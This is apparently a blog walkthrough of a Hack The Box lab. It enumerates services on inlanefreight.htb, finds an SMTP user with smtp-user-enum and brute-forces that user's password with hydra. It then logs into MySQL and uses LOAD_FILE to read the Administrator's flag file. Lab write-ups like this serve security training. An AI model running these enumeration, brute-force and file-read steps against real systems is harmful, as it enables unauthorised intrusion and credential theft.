Attacking Common Services - Easy Lab
We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:
HTB{...}
In this post, we will review the security of the first server, which is responsible for managing emails, customer data, and files.
Task
Assess the target server at the domain inlanefreight.htb and obtain the contents of the flag.txt file. Submit the flag as your answer.
Solution Steps:
Update /etc/hosts
Add the target IP and domain to the /etc/hosts file to facilitate easier access:
echo "10.129.xxx.xx inlanefreight.htb" | sudo tee -a /etc/hosts
Enumerate the Target
Perform a service scan on the target to identify open ports and services:
nmap -sV 10.129.xxx.xxx -Pn
Results:
21/tcp open ftp
25/tcp open smtp hMailServer smtpd
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
443/tcp open https?
587/tcp open smtp hMailServer smtpd
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open ms-wbt-server Microsoft Terminal Services
Find Valid Users
Use smtp-user-enum to identify valid SMTP users:
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.xxx.xx
Results:
Starting smtp-user-enum v1.2 (http://pentestmonkey.net/tools/smtp-user-enum)
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... userlist.txt
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Wed Aug 7 06:27:03 2024 #########
10.129.203.7: f****@inlanefreight.htb exists
######## Scan completed at Wed Aug 7 06:27:51 2024 #########
1 result found: **f****@inlanefreight.htb**
Brute-Force the Password
Use hydra to brute-force the password for the identified user:
hydra -l f****@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz -t 64 -f 10.129.xxx.xx smtp
Results:
login: f****@inlanefreight.htb password: 9********
Connect to MySQL
Log into the MySQL server using the credentials obtained:
mysql -u f**** -p9******** -h 10.129.xxx.xx
For reading local files in MySQL we will use command from module Cheat Sheet:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB [mariadb.org] binary distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
+------------------------------------------------------+
| LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt") |
+------------------------------------------------------+
| HTB{t*3_4r3_tw0_t0_93t_fl49} |
+------------------------------------------------------+
1 row in set (0.070 sec)
Happy Hunting!
By following these steps, we successfully identified a valid SMTP user, brute-forced their password, and accessed the MySQL database to retrieve the flag. This demonstrates a straightforward approach to assessing the security of email and database services.
Top comments (0)